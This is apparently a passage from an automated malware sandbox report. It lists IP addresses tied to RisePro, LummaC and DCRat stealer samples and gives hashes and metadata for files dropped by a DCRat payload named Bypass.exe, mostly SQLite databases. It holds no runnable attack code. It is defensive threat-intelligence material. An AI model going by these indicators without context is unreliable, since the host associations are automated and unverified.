                        • 34.117.186.192
                        plTAoSCew2.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        7rA1iX60wh.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        PsHQsuTG0H.dllGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        PNO3otPYOa.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        YnsEArPlqx.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        GOOGLE-AS-APGoogleAsiaPacificPteLtdSGhttp://dllavy.wixsite.com/mybt-view/Get hashmaliciousUnknownBrowse
                        • 34.117.60.144
                        4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • 34.117.186.192
                        BqqQh4Jr7L.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        https://peringatanfb772.wixsite.com/mysiteGet hashmaliciousUnknownBrowse
                        • 34.117.60.144
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        PsHQsuTG0H.dllGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        plTAoSCew2.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        7rA1iX60wh.exeGet hashmaliciousRisePro StealerBrowse
                        • 34.117.186.192
                        PsHQsuTG0H.dllGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        TIMEWEB-ASRUhttp://ct31152.tw1.ru/Get hashmaliciousUnknownBrowse
                        • 92.53.96.121
                        http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                        • 92.53.96.121
                        http://cv59800.tw1.ru/Get hashmaliciousUnknownBrowse
                        • 92.53.96.121
                        e64Gs23hN2.exeGet hashmaliciousDCRatBrowse
                        • 92.53.96.121
                        https://e-obmen24.com/Get hashmaliciousUnknownBrowse
                        • 92.53.96.128
                        R2KymBQ7YS.exeGet hashmaliciousDCRatBrowse
                        • 92.53.96.121
                        https://cs13786.tw1.ru/Get hashmaliciousUnknownBrowse
                        • 92.53.96.121
                        http://cf20871.tw1.ru/Get hashmaliciousUnknownBrowse
                        • 185.114.247.232
                        ebalcao_odqz.vbsGet hashmaliciousUnknownBrowse
                        • 92.53.116.138
                        COMMANDE.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                        • 92.53.96.22
                        CLOUDFLARENETUSSecuriteInfo.com.Trojan.InstallCore.4086.24549.19610.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                        • 104.18.20.226
                        SecuriteInfo.com.Trojan.InstallCore.4086.24549.19610.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                        • 104.18.20.226
                        file.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                        • 188.114.96.3
                        YNsc5U2Qff.exeGet hashmaliciousLummaCBrowse
                        • 188.114.97.3
                        http://117.212.168.75:43380/Mozi.mGet hashmaliciousUnknownBrowse
                        • 1.1.1.1
                        SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        College of the Canyons Consent Files#304861(Revised).pdfGet hashmaliciousHTMLPhisherBrowse
                        • 172.64.41.3
                        SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        https://kliwue-bolanti-boowe.pages.dev/help/contact/60448578785126Get hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120Get hashmaliciousUnknownBrowse
                        • 104.26.13.205
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        SecuriteInfo.com.Win64.TrojanX-gen.14485.639.exeGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://didianeensing-fft-oshehun.pages.dev/help/contact/897378126380120Get hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://eugeniewun72-englichs302.pages.dev/help/contact/337110003119106Get hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://sahilsendre.github.io/NETFLIX_CLONE_HTML_CSS_ONLYGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://higorgoltara.github.io/dio-instagram/indexGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://amazon-us.kcloudx.workers.dev/ref=cs_503_linkGet hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        http://dllavy.wixsite.com/mybt-view/Get hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        https://cakedrops.pages.dev/Get hashmaliciousUnknownBrowse
                        • 34.117.186.192
                        4h4b4EWVNU.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                        • 34.117.186.192
                        a0e9f5d64349fb13191bc781f81f42e1YNsc5U2Qff.exeGet hashmaliciousLummaCBrowse
                        • 104.21.90.18
                        BqqQh4Jr7L.exeGet hashmaliciousRisePro StealerBrowse
                        • 104.21.90.18
                        file.exeGet hashmaliciousRisePro StealerBrowse
                        • 104.21.90.18
                        omgsoft.exeGet hashmaliciousLummaCBrowse
                        • 104.21.90.18
                        Zahlung.docx.docGet hashmaliciousUnknownBrowse
                        • 104.21.90.18
                        TS-240622-Lumma4.exeGet hashmaliciousLummaCBrowse
                        • 104.21.90.18
                        NEW ORDER.docx.docGet hashmaliciousUnknownBrowse
                        • 104.21.90.18
                        https://bcr.serviciul.com/Get hashmaliciousUnknownBrowse
                        • 104.21.90.18
                        setup.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
                        • 104.21.90.18
                        SecuriteInfo.com.Script.SNH-gen.23298.6936.xlsxGet hashmaliciousUnknownBrowse
                        • 104.21.90.18
                        No context
                        Process:C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1848832
                        Entropy (8bit):4.5784850862937665
                        Encrypted:false
                        SSDEEP:24576:B521pJhV0x6LrySNYWaJTHbkA+mfQWLNfXyAHNd5CqF0AqT2:nApfcnzdbkZ5Y3d5Co
                        MD5:93E99FB34AC2CD9D6E867E24DCAFB2AB
                        SHA1:C6EE148ABC972494C2912E68534512160372F4A6
                        SHA-256:8CF7A779191A6B146749DE10A52303201D4C72621F04D1336D51F400256D662E
                        SHA-512:65ADE8226509BDF7B160F04BC6CBB12C790C7A960DDEE6776AA0E6094246062F323A80DD2D858A49AAFEF5CC5DB2ADE00A8A42D939FF3571029172AA7D34D877
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security
                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security
                        • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: ditekSHen
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 79%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.........."..................L... ...`....@.. ..............................ZJ....@..................................L..W....`............................................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................L......H.......H...LG..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):1.1510207563435464
                        Encrypted:false
                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                        Malicious:false
                        Preview:@...e................................................@..........
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
